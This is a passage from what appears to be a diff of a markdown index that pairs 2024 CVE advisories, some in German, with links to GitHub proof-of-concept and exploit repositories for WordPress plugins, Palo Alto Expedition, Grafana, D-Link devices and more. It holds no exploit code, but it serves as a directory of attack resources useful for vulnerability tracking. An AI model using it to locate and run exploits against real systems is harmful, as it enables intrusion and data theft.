is only exploitable if the app secret is not set, so it has a default empty value. + + +- [RandomRobbieBF/CVE-2024-9106](https://github.com/RandomRobbieBF/CVE-2024-9106) + +### CVE-2024-9162 (2024-10-28) + +The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. + + +- [d0n601/CVE-2024-9162](https://github.com/d0n601/CVE-2024-9162) + +### CVE-2024-9166 (2024-09-26) + +The device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access. + + +- [Andrysqui/CVE-2024-9166](https://github.com/Andrysqui/CVE-2024-9166) + +### CVE-2024-9224 (2024-10-01) + +The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-9224](https://github.com/RandomRobbieBF/CVE-2024-9224) + +### CVE-2024-9234 (2024-10-11) + +The GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins. + + +- [RandomRobbieBF/CVE-2024-9234](https://github.com/RandomRobbieBF/CVE-2024-9234) +- [CallMeBatosay/CVE-2024-9234](https://github.com/CallMeBatosay/CVE-2024-9234) +- [Nxploited/CVE-2024-9234](https://github.com/Nxploited/CVE-2024-9234) + +### CVE-2024-9264 (2024-10-18) + +The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions. + + +- [nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264) +- [z3k0sec/File-Read-CVE-2024-9264](https://github.com/z3k0sec/File-Read-CVE-2024-9264) +- [z3k0sec/CVE-2024-9264-RCE-Exploit](https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit) +- [punitdarji/Grafana-CVE-2024-9264](https://github.com/punitdarji/Grafana-CVE-2024-9264) + +### CVE-2024-9290 (2024-12-13) + +The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [RandomRobbieBF/CVE-2024-9290](https://github.com/RandomRobbieBF/CVE-2024-9290) +- [Jenderal92/CVE-2024-9290](https://github.com/Jenderal92/CVE-2024-9290) + +### CVE-2024-9326 (2024-09-29) + +In PHPGurukul Online Shopping Portal 2.0 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Datei /shopping/admin/index.php der Komponente Admin Panel. Mit der Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [ghostwirez/CVE-2024-9326-PoC](https://github.com/ghostwirez/CVE-2024-9326-PoC) + +### CVE-2024-9441 (2024-10-02) + +The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS command injection vulnerability. A remote and unauthenticated attacker can execute arbitrary OS commands via the login_id parameter when invoking the forgot_password functionality over HTTP. + + +- [adhikara13/CVE-2024-9441](https://github.com/adhikara13/CVE-2024-9441) +- [p33d/CVE-2024-9441](https://github.com/p33d/CVE-2024-9441) +- [XiaomingX/cve-2024-9441-poc](https://github.com/XiaomingX/cve-2024-9441-poc) +- [jk-mayne/CVE-2024-9441-Checker](https://github.com/jk-mayne/CVE-2024-9441-Checker) + +### CVE-2024-9464 (2024-10-09) + +An OS command injection vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls. + + +- [horizon3ai/CVE-2024-9464](https://github.com/horizon3ai/CVE-2024-9464) + +### CVE-2024-9465 (2024-10-09) + +An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system. + + +- [horizon3ai/CVE-2024-9465](https://github.com/horizon3ai/CVE-2024-9465) +- [mustafaakalin/CVE-2024-9465](https://github.com/mustafaakalin/CVE-2024-9465) +- [XiaomingX/cve-2024-9465-poc](https://github.com/XiaomingX/cve-2024-9465-poc) + +### CVE-2024-9466 (2024-10-09) + +A cleartext storage of sensitive information vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to reveal firewall usernames, passwords, and API keys generated using those credentials. + + +- [holypryx/CVE-2024-9466](https://github.com/holypryx/CVE-2024-9466) + +### CVE-2024-9474 (2024-11-18) + +A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.\n\nCloud NGFW and Prisma Access are not impacted by this vulnerability. + + +- [Chocapikk/CVE-2024-9474](https://github.com/Chocapikk/CVE-2024-9474) +- [k4nfr3/CVE-2024-9474](https://github.com/k4nfr3/CVE-2024-9474) +- [deathvu/CVE-2024-9474](https://github.com/deathvu/CVE-2024-9474) +- [coskper-papa/PAN-OS_CVE-2024-9474](https://github.com/coskper-papa/PAN-OS_CVE-2024-9474) + +### CVE-2024-9570 (2024-10-07) + +Eine Schwachstelle wurde in D-Link DIR-619L B1 2.06 gefunden. Sie wurde als kritisch eingestuft. Hierbei geht es um die Funktion formEasySetTimezone der Datei /goform/formEasySetTimezone. Durch das Beeinflussen des Arguments curTime mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [dylvie/CVE-2024-9570_D-Link-DIR-619L-bof](https://github.com/dylvie/CVE-2024-9570_D-Link-DIR-619L-bof) + +### CVE-2024-9593 (2024-10-18) + +The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified. + + +- [RandomRobbieBF/CVE-2024-9593](https://github.com/RandomRobbieBF/CVE-2024-9593) +- [0x4f5da2-venom/CVE-2024-9593-EXP](https://github.com/0x4f5da2-venom/CVE-2024-9593-EXP) +- [Nxploited/CVE-2024-9593-Exploit](https://github.com/Nxploited/CVE-2024-9593-Exploit) + +### CVE-2024-9680 (2024-10-09) + +An attacker was able to achieve code execution in the content process by exploiting a use-after-free in Animation timelines. We have had reports of this vulnerability being exploited in the wild. This vulnerability affects Firefox < 131.0.2, Firefox ESR < 128.3.1, Firefox ESR < 115.16.1, Thunderbird < 131.0.1, Thunderbird < 128.3.1, and Thunderbird < 115.16.0. + + +- [tdonaworth/Firefox-CVE-2024-9680](https://github.com/tdonaworth/Firefox-CVE-2024-9680) +- [PraiseImafidon/Version_Vulnerability_Scanner](https://github.com/PraiseImafidon/Version_Vulnerability_Scanner) + +### CVE-2024-9707 (2024-10-11) + +The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [RandomRobbieBF/CVE-2024-9707](https://github.com/RandomRobbieBF/CVE-2024-9707) + +### CVE-2024-9796 (2024-10-10) + +The WP-Advanced-Search WordPress plugin before 3.3.9.2 does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + + +- [RandomRobbieBF/CVE-2024-9796](https://github.com/RandomRobbieBF/CVE-2024-9796) +- [issamjr/CVE-2024-9796](https://github.com/issamjr/CVE-2024-9796) + +### CVE-2024-9821 (2024-10-12) + +The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature. + + +- [RandomRobbieBF/CVE-2024-9821](https://github.com/RandomRobbieBF/CVE-2024-9821) + +### CVE-2024-9822 (2024-10-11) + +The Pedalo Connector plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.5. This is due to insufficient restriction on the 'login_admin_user' function. This makes it possible for unauthenticated attackers to log to the first user, who is usually the administrator, or if it does not exist, then to the first administrator. + + +- [RandomRobbieBF/CVE-2024-9822](https://github.com/RandomRobbieBF/CVE-2024-9822) + +### CVE-2024-9890 (2024-10-26) + +The User Toolkit plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.3. This is due to an improper capability check in the 'switchUser' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator. + + +- [RandomRobbieBF/CVE-2024-9890](https://github.com/RandomRobbieBF/CVE-2024-9890) + +### CVE-2024-9926 (2024-11-07) + +The Jetpack WordPress plugin does not have proper authorisation in one of its REST endpoint, allowing any authenticated users, such as subscriber to read arbitrary feedbacks data sent via the Jetpack Contact Form + + +- [m3ssap0/wordpress-jetpack-broken-access-control-vulnerable-application](https://github.com/m3ssap0/wordpress-jetpack-broken-access-control-vulnerable-application) +- [m3ssap0/wordpress-jetpack-broken-access-control-exploit](https://github.com/m3ssap0/wordpress-jetpack-broken-access-control-exploit) + +### CVE-2024-9932 (2024-10-26) + +The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [RandomRobbieBF/CVE-2024-9932](https://github.com/RandomRobbieBF/CVE-2024-9932) + +### CVE-2024-9933 (2024-10-26) + +The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.6. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user. + + +- [RandomRobbieBF/CVE-2024-9933](https://github.com/RandomRobbieBF/CVE-2024-9933) +- [Nxploited/CVE-2024-9933](https://github.com/Nxploited/CVE-2024-9933) + +### CVE-2024-9935 (2024-11-16) + +The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. + + +- [RandomRobbieBF/CVE-2024-9935](https://github.com/RandomRobbieBF/CVE-2024-9935) +- [verylazytech/CVE-2024-9935](https://github.com/verylazytech/CVE-2024-9935) +- [Nxploited/CVE-2024-9935](https://github.com/Nxploited/CVE-2024-9935) + +### CVE-2024-9955 (2024-10-15) + +Use after free in WebAuthentication in Google Chrome prior to 130.0.6723.58 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) + + +- [amfg145/CVE-2024-9955-POC](https://github.com/amfg145/CVE-2024-9955-POC) + +### CVE-2024-10015 (2024-11-16) + +The ConvertCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'type' parameters in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-10015](https://github.com/windz3r0day/CVE-2024-10015) + +### CVE-2024-10124 (2024-12-12) + +The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1. + + +- [RandomRobbieBF/CVE-2024-10124](https://github.com/RandomRobbieBF/CVE-2024-10124) +- [Nxploited/CVE-2024-10124-Poc](https://github.com/Nxploited/CVE-2024-10124-Poc) + +### CVE-2024-10140 (2024-10-19) + +Eine kritische Schwachstelle wurde in code-projects Pharmacy Management System 1.0 entdeckt. Betroffen davon ist ein unbekannter Prozess der Datei /manage_supplier.php. Durch Beeinflussen des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [holypryx/CVE-2024-10140](https://github.com/holypryx/CVE-2024-10140) + +### CVE-2024-10220 (2024-11-22) + +The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes.This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2. + + +- [mochizuki875/CVE-2024-10220-githooks](https://github.com/mochizuki875/CVE-2024-10220-githooks) +- [any2sec/cve-2024-10220](https://github.com/any2sec/cve-2024-10220) +- [XiaomingX/cve-2024-10220-githooks](https://github.com/XiaomingX/cve-2024-10220-githooks) +- [filipzag/CVE-2024-10220](https://github.com/filipzag/CVE-2024-10220) +- [candranapits/poc-CVE-2024-10220](https://github.com/candranapits/poc-CVE-2024-10220) + +### CVE-2024-10245 (2024-11-12) + +The Relais 2FA plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0. This is due to incorrect authentication and capability checking in the 'rl_do_ajax' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. + + +- [RandomRobbieBF/CVE-2024-10245](https://github.com/RandomRobbieBF/CVE-2024-10245) + +### CVE-2024-10354 (2024-10-25) + +In SourceCodester Petrol Pump Management Software 1.0 wurde eine kritische Schwachstelle entdeckt. Das betrifft eine unbekannte Funktionalität der Datei /admin/print.php. Mit der Manipulation des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nakoo/CVE-2024-10354](https://github.com/K1nakoo/CVE-2024-10354) + +### CVE-2024-10355 (2024-10-25) + +Eine kritische Schwachstelle wurde in SourceCodester Petrol Pump Management Software 1.0 entdeckt. Dies betrifft einen unbekannten Teil der Datei /admin/invoice.php. Durch die Manipulation des Arguments id mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nakoo/CVE-2024-10355](https://github.com/K1nakoo/CVE-2024-10355) + +### CVE-2024-10400 (2024-11-21) + +The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [k0ns0l/CVE-2024-10400](https://github.com/k0ns0l/CVE-2024-10400) + +### CVE-2024-10410 (2024-10-27) + +In SourceCodester Online Hotel Reservation System 1.0 wurde eine kritische Schwachstelle entdeckt. Dabei geht es um die Funktion upload der Datei /admin/mod_room/controller.php?action=add. Dank Manipulation des Arguments image mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [K1nakoo/CVE-2024-10410](https://github.com/K1nakoo/CVE-2024-10410) + +### CVE-2024-10448 (2024-10-28) + +Eine problematische Schwachstelle wurde in code-projects Blood Bank Management System 1.0 entdeckt. Betroffen davon ist ein unbekannter Prozess der Datei /file/delete.php. Dank Manipulation des Arguments bid mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10448](https://github.com/bevennyamande/CVE-2024-10448) + +### CVE-2024-10449 (2024-10-28) + +Es wurde eine kritische Schwachstelle in Codezips Hospital Appointment System 1.0 gefunden. Betroffen hiervon ist ein unbekannter Ablauf der Datei /loginAction.php. Mit der Manipulation des Arguments Username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [g-u-i-d/CVE-2024-10449-patch](https://github.com/g-u-i-d/CVE-2024-10449-patch) + +### CVE-2024-10470 (2024-11-09) + +The WPLMS Learning Management System for WordPress, WordPress LMS theme for WordPress is vulnerable to arbitrary file read and deletion due to insufficient file path validation and permissions checks in the readfile and unlink functions in all versions up to, and including, 4.962. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The theme is vulnerable even when it is not activated. + + +- [RandomRobbieBF/CVE-2024-10470](https://github.com/RandomRobbieBF/CVE-2024-10470) +- [0xshoriful/CVE-2024-10470](https://github.com/0xshoriful/CVE-2024-10470) + +### CVE-2024-10508 (2024-11-09) + +The RegistrationMagic – User Registration Plugin with Custom Registration Forms plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 6.0.2.6. This is due to the plugin not properly validating the password reset token prior to updating a user's password. This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, and gain access to these accounts. + + +- [ubaii/CVE-2024-10508](https://github.com/ubaii/CVE-2024-10508) +- [Jenderal92/CVE-2024-10508](https://github.com/Jenderal92/CVE-2024-10508) + +### CVE-2024-10511 (2024-12-11) + +CWE-287: Improper Authentication vulnerability exists that could cause Denial of access to the web interface\nwhen someone on the local network repeatedly requests the /accessdenied URL. + + +- [revengsmK/CVE-2024-10511](https://github.com/revengsmK/CVE-2024-10511) + +### CVE-2024-10516 (2024-12-06) + +The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + + +- [RandomRobbieBF/CVE-2024-10516](https://github.com/RandomRobbieBF/CVE-2024-10516) + +### CVE-2024-10542 (2024-11-26) + +The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [ubaii/CVE-2024-10542](https://github.com/ubaii/CVE-2024-10542) + +### CVE-2024-10557 (2024-10-31) + +In code-projects Blood Bank Management System 1.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /file/updateprofile.php. Mit der Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10557](https://github.com/bevennyamande/CVE-2024-10557) + +### CVE-2024-10586 (2024-11-09) + +The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to to create arbitrary files such as .php files that can be leveraged for remote code execution. + + +- [RandomRobbieBF/CVE-2024-10586](https://github.com/RandomRobbieBF/CVE-2024-10586) + +### CVE-2024-10592 (2024-11-16) + +The Mapster WP Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the popup class parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-10592](https://github.com/windz3r0day/CVE-2024-10592) + +### CVE-2024-10605 (2024-10-31) + +Es wurde eine Schwachstelle in code-projects Blood Bank Management System 1.0 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Datei /file/request.php. Durch die Manipulation mit unbekannten Daten kann eine cross-site request forgery-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [bevennyamande/CVE-2024-10605](https://github.com/bevennyamande/CVE-2024-10605) + +### CVE-2024-10629 (2024-11-13) + +The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible. + + +- [RandomRobbieBF/CVE-2024-10629](https://github.com/RandomRobbieBF/CVE-2024-10629) + +### CVE-2024-10654 (2024-11-01) + +In TOTOLINK LR350 bis 9.3.5u.6369 wurde eine Schwachstelle gefunden. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /formLoginAuth.htm. Dank der Manipulation des Arguments authCode mit der Eingabe 1 mit unbekannten Daten kann eine authorization bypass-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 9.3.5u.6698_B20230810 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [c0nyy/IoT_vuln](https://github.com/c0nyy/IoT_vuln) + +### CVE-2024-10728 (2024-11-16) + +The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the 'install_required_plugin_callback' function in all versions up to, and including, 4.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + + +- [RandomRobbieBF/CVE-2024-10728](https://github.com/RandomRobbieBF/CVE-2024-10728) + +### CVE-2024-10793 (2024-11-15) + +The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. + + +- [windz3r0day/CVE-2024-10793](https://github.com/windz3r0day/CVE-2024-10793) +- [MAHajian/CVE-2024-10793](https://github.com/MAHajian/CVE-2024-10793) + +### CVE-2024-10914 (2024-11-06) + +In D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L bis 20241028 wurde eine kritische Schwachstelle ausgemacht. Hierbei betrifft es die Funktion cgi_user_add der Datei /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. Durch Manipulation des Arguments name mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Die Komplexität eines Angriffs ist eher hoch. Sie gilt als schwierig ausnutzbar. Der Exploit steht zur öffentlichen Verfügung. + + +- [imnotcha0s/CVE-2024-10914](https://github.com/imnotcha0s/CVE-2024-10914) +- [verylazytech/CVE-2024-10914](https://github.com/verylazytech/CVE-2024-10914) +- [Egi08/CVE-2024-10914](https://github.com/Egi08/CVE-2024-10914) +- [Bu0uCat/D-Link-NAS-CVE-2024-10914-](https://github.com/Bu0uCat/D-Link-NAS-CVE-2024-10914-) +- [ThemeHackers/CVE-2024-10914](https://github.com/ThemeHackers/CVE-2024-10914) +- [retuci0/cve-2024-10914-port](https://github.com/retuci0/cve-2024-10914-port) +- [K3ysTr0K3R/CVE-2024-10914-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-10914-EXPLOIT) +- [jahithoque/CVE-2024-10914-Exploit](https://github.com/jahithoque/CVE-2024-10914-Exploit) +- [redspy-sec/D-Link](https://github.com/redspy-sec/D-Link) +- [dragonXZH/CVE-2024-10914](https://github.com/dragonXZH/CVE-2024-10914) + +### CVE-2024-10924 (2024-11-15) + +The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default). + + +- [RandomRobbieBF/CVE-2024-10924](https://github.com/RandomRobbieBF/CVE-2024-10924) +- [m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application) +- [MattJButler/CVE-2024-10924](https://github.com/MattJButler/CVE-2024-10924) +- [m3ssap0/wordpress-really-simple-security-authn-bypass-exploit](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit) +- [Trackflaw/CVE-2024-10924-Wordpress-Docker](https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker) +- [Maalfer/CVE-2024-10924-PoC](https://github.com/Maalfer/CVE-2024-10924-PoC) +- [D1se0/CVE-2024-10924-Bypass-MFA-Wordpress-LAB](https://github.com/D1se0/CVE-2024-10924-Bypass-MFA-Wordpress-LAB) +- [Hunt3r850/CVE-2024-10924-PoC](https://github.com/Hunt3r850/CVE-2024-10924-PoC) +- [Hunt3r850/CVE-2024-10924-Wordpress-Docker](https://github.com/Hunt3r850/CVE-2024-10924-Wordpress-Docker) + +### CVE-2024-10958 (2024-11-10) + +The The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution via getshortcodedrenderedfenodelay AJAX action in all versions up to, and including, 8.8.08.007 . This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. + + +- [reinh3rz/CVE-2024-10958-WPPA-Exploit](https://github.com/reinh3rz/CVE-2024-10958-WPPA-Exploit) + +### CVE-2024-11003 (2024-11-19) + +Qualys discovered that needrestart, before version 3.8, passes unsanitized data to a library (Modules::ScanDeps) which expects safe input. This could allow a local attacker to execute arbitrary shell commands. Please see the related CVE-2024-10224 in Modules::ScanDeps. + + +- [unknown-user-from/CVE-2024-11003-PoC](https://github.com/unknown-user-from/CVE-2024-11003-PoC) + +### CVE-2024-11199 (2024-11-23) + +The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [windz3r0day/CVE-2024-11199](https://github.com/windz3r0day/CVE-2024-11199) + +### CVE-2024-11201 (2024-12-06) + +The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + + +- [NSQAQ/CVE-2024-11201](https://github.com/NSQAQ/CVE-2024-11201) + +### CVE-2024-11252 (2024-11-30) + +The Social Sharing Plugin – Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.69 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [reinh3rz/CVE-2024-11252-Sassy-Social-Share-XSS](https://github.com/reinh3rz/CVE-2024-11252-Sassy-Social-Share-XSS) + +### CVE-2024-11281 (2024-12-25) + +The WooCommerce Point of Sale plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0. This is due to insufficient validation on the 'logged_in_user_id' value when option values are empty and the ability for attackers to change the email of arbitrary user accounts. This makes it possible for unauthenticated attackers to change the email of arbitrary user accounts, including administrators, and reset their password to gain access to the account. + + +- [McTavishSue/CVE-2024-11281](https://github.com/McTavishSue/CVE-2024-11281) + +### CVE-2024-11318 (2024-11-18) + +An IDOR (Insecure Direct Object Reference) vulnerability has been discovered in AbsysNet, affecting version 2.3.1. This vulnerability could allow a remote attacker to obtain the session of an unauthenticated user by brute-force attacking the session identifier on the "/cgi-bin/ocap/" endpoint. + + +- [xthalach/CVE-2024-11318](https://github.com/xthalach/CVE-2024-11318) + +### CVE-2024-11320 (2024-11-21) + +Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS: from 700 through <=777.4 + + +- 